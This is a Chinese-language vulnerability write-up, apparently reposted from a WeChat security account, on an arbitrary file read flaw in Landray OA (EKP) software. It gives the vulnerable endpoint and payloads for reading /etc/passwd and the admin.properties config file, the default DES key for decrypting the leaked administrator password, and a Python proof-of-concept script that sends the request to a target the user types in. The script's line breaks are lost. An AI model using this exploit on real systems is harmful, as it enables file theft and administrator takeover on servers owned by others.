一、漏洞描述
深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用该漏洞获取服务器敏感信息。
二、漏洞复现
访问以下接口
/sys/ui/extend/varkind/custom.jsp
根据返回页面可以看到是存在该接口的
然后抓包并修改为POST方式,并加上payload
var={"body":{"file":"file:///etc/passwd"}} 针对linux服务器var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}} 针对windows服务器
通过对比可以知道不要试完payload读不出来就放弃了,觉得它不存在这个漏洞,说不定这个服务器是在windows上呐。
这里读取的admin.properties配置文件可以泄露系统后台的密码
由于蓝凌OA默认是DES加密,且 默认密钥为 kmssAdminKey,所以只要拿着响应中的password值进行解密就好(返回的password字符串去掉末尾的/r再进行解密)
DES解密
http://tool.chacuo.net/cryptdes/
得到密码之后即可访问后台以管理员身份登入系统
http://xx.xx.xx.xx/admin.do
三、POC脚本
漏洞利用脚本如下
#!/usr/bin/python3#-*- coding:utf-8 -*-import base64import requestsimport randomimport reimport jsonimport sysdef title():print('+------------------------------------------')print('++++++ 公众号: 守卫者安全 ')print('++++++ POC名称: 蓝凌OA 任意文件读取POC ')print('++++++ 使用方法: python3 poc.py ')print('++++++ Url >>> http://xxx.xxx.xxx.xxx ')print('+------------------------------------------')def POC_1(target_url):vuln_url = target_url + "/sys/ui/extend/varkind/custom.jsp"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36","Content-Type": "application/x-www-form-urlencoded"}data = 'var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}'#proxies = {'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'}try:response = requests.post(url=vuln_url, data=data, headers=headers, verify=False)print("正在请求 {}/sys/ui/extend/varkind/custom.jsp ".format(target_url))if "password" in response.text and response.status_code == 200:print("成功读取 admin.properties 响应为:{} ".format(response.text))except Exception as e:print("请求失败:{} ".format(e))sys.exit(0)#if __name__ == '__main__':title()target_url = str(input("Please input Attack Url >>> "))POC_1(target_url)
原文始发于微信公众号(守卫者安全):蓝凌OA任意文件读取漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论